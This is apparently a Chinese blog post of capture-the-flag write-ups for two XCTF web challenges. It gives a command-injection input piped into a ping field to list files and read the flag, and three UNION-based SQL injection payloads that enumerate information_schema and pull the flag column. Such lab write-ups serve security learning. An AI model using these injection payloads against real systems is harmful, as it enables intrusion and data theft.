hhh之前几天因为要练车还有各种各样的事情耽搁了,虽然每天都还有坚持做题但是也就没有那么多时间来写博客打卡了(捂脸 不过后面会花时间把重要的知识点补写出来的
XCTF command_execution
点进去是一个Ping测试模块,根据题目漏洞猜测这个ping地址框里或许能做代码拼接,也就是说后台的代码可能是类似于 $command='ping'+$input 这种危险的形式,可能可以用|或者&&这类符号做命令拼接
尝试输入127.0.0.1 | ls
发现除了Ping还返回了index.php 说明猜测正确
于是陆续拼接find / -name "flag*" 和 cat 找到的路径 即可获得flag
XCTF NewsCenter
搜索框内可注入,但是如果出现语法错误服务器直接返回500错误。。。
0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#
0' union select 1,2,fl4g from news.secret_table#
手工注入还是得清楚了解SQL语法,尤其是information_schema的结构,这题明明挺简单的但是我写了挺久。。不然天天用sqlmap跑还真就跑成了脚本小子(捂脸
Comments | NOTHING